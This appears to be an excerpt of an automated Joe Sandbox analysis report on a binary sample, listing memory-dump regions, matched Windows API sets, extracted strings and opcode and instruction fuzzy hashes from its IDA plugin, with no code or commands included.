                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ExceptionFailFastRaise
                      • String ID: [ KeepUnwinding ]
                      • API String ID: 2546344036-400895726
                      • Opcode ID: dab291b85a8ce5d589c2bd9b116d5d2e693857a81769f322aec2306361bfc59e
                      • Instruction ID: 9fcd8aaa14e356d63bd1afe3f3bdf2e5f9606c3e823c481b0a7b96f0d780e17e
                      • Opcode Fuzzy Hash: dab291b85a8ce5d589c2bd9b116d5d2e693857a81769f322aec2306361bfc59e
                      • Instruction Fuzzy Hash: 78C18F73A19B42C1EB558F25E5502A933B9FF44B58F18463ACE4D8B398EF39E486C710
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                      • String ID:
                      • API String ID: 2933794660-0
                      • Opcode ID: 117093f8d48222a74511d4297b00894299081f1a55061830870522c5ba379115
                      • Instruction ID: 19da45515222b6dd1ceb93a6024168004c7a01d50b6a2c3f428c45e8ab9a6ab8
                      • Opcode Fuzzy Hash: 117093f8d48222a74511d4297b00894299081f1a55061830870522c5ba379115
                      • Instruction Fuzzy Hash: 4E112E22B24F418AEB40DF60E8552B833A4FB59758F441E31DA6D87BA4EF7CE1A4C340
                      APIs
                      Strings
                      • The required instruction sets are not supported by the current CPU., xrefs: 00007FF67DCB578E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ExceptionFailFastRaise
                      • String ID: The required instruction sets are not supported by the current CPU.
                      • API String ID: 2546344036-3318624164
                      • Opcode ID: f618e1b964131593879fc6ef3cc786b0ff1d489d28f5c64add1a197e72f52fd0
                      • Instruction ID: e601f357ccb515eaedd140ad349c6f1e4055818c2e4b13ec6e989720cf757b85
                      • Opcode Fuzzy Hash: f618e1b964131593879fc6ef3cc786b0ff1d489d28f5c64add1a197e72f52fd0
                      • Instruction Fuzzy Hash: AB714073F3C2A68AF724CB19A44593966A96F61354F900E38D50ECBED1FD2EF8524B04
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: BreakCounterCreateDebugEventPerformanceQuery
                      • String ID:
                      • API String ID: 4239280443-0
                      • Opcode ID: 31cf48b61cf1ce4dbab0a6b664b4d7c0e05dddb5d7e5ab2a0916dd3adb355843
                      • Instruction ID: 09e12cea7697b43324ceb740826cf4db1f08331ccd44488b3e7ac78e7bcf15f9
                      • Opcode Fuzzy Hash: 31cf48b61cf1ce4dbab0a6b664b4d7c0e05dddb5d7e5ab2a0916dd3adb355843
                      • Instruction Fuzzy Hash: 8542D573928BC285E644CB34BC8026837A8FB98744F565B39D98CA3765FF7CA1A1D701
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      • Opcode ID: 702d9e7e669e9ba2a144e5b8aea13f5e9f2ed0e32e4e8ade29524c6219cc69f2
                      • Instruction ID: 9ed0ff00bc6e1729f701a12dd04d8b78b2856ff0030f640e523f125354d3cf5d
                      • Opcode Fuzzy Hash: 702d9e7e669e9ba2a144e5b8aea13f5e9f2ed0e32e4e8ade29524c6219cc69f2
                      • Instruction Fuzzy Hash: 6C52B1B3A28BC686EA11CF25E84127977A9FB457A4F450B35DA5E83790EF3CE451C301
                      Strings
                      • ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}, xrefs: 00007FF67DCD896B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}
                      • API String ID: 0-2256439813
                      • Opcode ID: 42bf1560006a13b0a7c827c9a04a10aa9f2241fbadd663d7076ebba3c9ba8673
                      • Instruction ID: adf6e53a69e9c7daf7323ce0cebbf579fbd68d0ac46047505de76401d3673214
                      • Opcode Fuzzy Hash: 42bf1560006a13b0a7c827c9a04a10aa9f2241fbadd663d7076ebba3c9ba8673
                      • Instruction Fuzzy Hash: 05429233A29BC686EA45CB29E94037877A4FF44744F258A36CA4D87361EF3DE062C301
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: ?
                      • API String ID: 0-1684325040
                      • Opcode ID: 34c0dc251892f11cf7d9e199c7ff66380f72b36936934ca171ea1f48237259aa
                      • Instruction ID: a6c105aab2a20ccaaed1e0c93da1aa867e0d1dda1c5d300dd06c08e9f7c895ff
                      • Opcode Fuzzy Hash: 34c0dc251892f11cf7d9e199c7ff66380f72b36936934ca171ea1f48237259aa
                      • Instruction Fuzzy Hash: BD12BE73A29A8282EA10CB15E4446B967ADFB46B94F144B32DF5D877D4EF3CE482D700
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d33924abe3f42c54ee12be418d667e73a0a90b33c06acae2a44cfa7a1fecb1de
                      • Instruction ID: cba72663bb88f5217b46379a74f408739da30d64e33dadf754c69f3c3c4975fc
                      • Opcode Fuzzy Hash: d33924abe3f42c54ee12be418d667e73a0a90b33c06acae2a44cfa7a1fecb1de
                      • Instruction Fuzzy Hash: 8592C2A3E39B8685EA019B25A9517B4A7A9BF45BC4F154B36D90ED3360FF3DF4428300
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ac5ee575158c561d5d2a4f28f2664afc57fdc3645f25469010ebbf959737b059
                      • Instruction ID: 0c453df4f7edfbfa2da246208967d46d301e5489ff1fc987d8c001feefb99514
                      • Opcode Fuzzy Hash: ac5ee575158c561d5d2a4f28f2664afc57fdc3645f25469010ebbf959737b059
                      • Instruction Fuzzy Hash: 844280B3B28B9586EB108B65E4411AD77B5FB44BC8F141A35EE4D97B98EE3CE442C700
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9f096069f9d4ed4ea6c4d8b84aa161e205579bef809260cba1ebab1ce8cdc0b7
                      • Instruction ID: 400df4df60791e14ff51c90648163df84eb12eea365d0a8d1f582294794346f9
                      • Opcode Fuzzy Hash: 9f096069f9d4ed4ea6c4d8b84aa161e205579bef809260cba1ebab1ce8cdc0b7
                      • Instruction Fuzzy Hash: 473272B3F2DB9585EB10CF75D4012AC27B9AB44798F154A36CE0D9BB98EE38E456C340
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5dcfc29c500fd793c30ae6df29eb4cbf164e5484d9a9cb05eb12e02bb22df5e4
                      • Instruction ID: cf80c7618c50f1baaceb8bb847a6d618e8524547be8ef96b0b9a7ed6807f43e7
                      • Opcode Fuzzy Hash: 5dcfc29c500fd793c30ae6df29eb4cbf164e5484d9a9cb05eb12e02bb22df5e4
                      • Instruction Fuzzy Hash: 5002C573B68A8586FA148F69E84067C37A4EB40BA4F548B31CA6D977D4EF3CE442D701
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CounterPerformanceQuery
                      • String ID:
                      • API String ID: 2783962273-0
                      • Opcode ID: 5af5f63dcc86133a8a2d15b087edacc6220407739e92971b4d31ee62c5bff28e
                      • Instruction ID: 9c988ee84d180d3d8357eaa072c14e7c931d4082716c4c324e11e378506d90cd
                      • Opcode Fuzzy Hash: 5af5f63dcc86133a8a2d15b087edacc6220407739e92971b4d31ee62c5bff28e
                      • Instruction Fuzzy Hash: D5029123E2AB8645EA56CB34D46037467B8BF49B58F254B35DA4D933A1FF3DE492C200
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e3081d85abe31c2ea19e498ffb53e1d9d8abab22bc1347291ce38af1670bf61d
                      • Instruction ID: a355ed1de04992ce37b161090b1efbc3b6a028b1b3a5a9cbe4bfaebb9ff53c73
                      • Opcode Fuzzy Hash: e3081d85abe31c2ea19e498ffb53e1d9d8abab22bc1347291ce38af1670bf61d
                      • Instruction Fuzzy Hash: 44E191B3A29BC586EB558B25E94137877E5BB49B84F054B36C94E833A0EF3CE485C701
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e7858e46456ae85e729f2cd15505e0535f1daab729ee9194f3b71da9917305d0
                      • Instruction ID: 6ca986af3427a6f80177fe3fdcbced5d4ee1f16304ca555cff8232c5c9712683
                      • Opcode Fuzzy Hash: e7858e46456ae85e729f2cd15505e0535f1daab729ee9194f3b71da9917305d0
                      • Instruction Fuzzy Hash: 3FC19073A68A8686EA00CB25ED5027877A5FF45B90F564B36C95E837D4EF3CE452C301
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 87a9e1316ae7c537e829b6c01444678f52bece2c80465a58d20448421e9007bc
                      • Instruction ID: ddcd4de5595f5cb9c49ab8be8ec0053b50778588d25aff7e605a6b208ed8a2a8
                      • Opcode Fuzzy Hash: 87a9e1316ae7c537e829b6c01444678f52bece2c80465a58d20448421e9007bc
                      • Instruction Fuzzy Hash: AAB1AE33A2D65186E7658B26A50477E76E1EB80BD4F008735EA8D83B98FF3CD481CB40
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 769cacd4ee175a8b55fcfdd41ddef0e32f473ae537d8ec8258f818ee0db44cf0
                      • Instruction ID: 2f19a615acab749ed4045c865b3bc66a0969f5bec99b71eb146bdab0c8c77a5d
                      • Opcode Fuzzy Hash: 769cacd4ee175a8b55fcfdd41ddef0e32f473ae537d8ec8258f818ee0db44cf0
                      • Instruction Fuzzy Hash: E2C19273B28B9682EA00CB25E851278B7A9FF45794B460B36C95DC7790EF3CE451C701
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ef581f49f2bbca10592a8ef9fae315d58ae8bcec94e63ba16ce4536efbd6aedb
                      • Instruction ID: ede40598f147cc130f4b476f27f1e4a7e68645945823e88cb36c1feb8d3b9766
                      • Opcode Fuzzy Hash: ef581f49f2bbca10592a8ef9fae315d58ae8bcec94e63ba16ce4536efbd6aedb
                      • Instruction Fuzzy Hash: 11914B33A69B8286E760CB25E94076933A4FB48784F114B36DA8DC3765FF7CE0928701
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b4e3e56eb3348b29035f093609789f8e02d2ce81ca924eedc20fb57aa0edaad1
                      • Instruction ID: 43f6beeec66e3c32b271607771bb46a85d49e1add87b02d053e0d6ccd5bbfb89
                      • Opcode Fuzzy Hash: b4e3e56eb3348b29035f093609789f8e02d2ce81ca924eedc20fb57aa0edaad1
                      • Instruction Fuzzy Hash: 5851F727FBA74E01E906877A65416B951666F5E7C0E2CCF32D90EB6790FF3DB0828600
                      Memory Dump Source
                      • Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true
                      • Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File
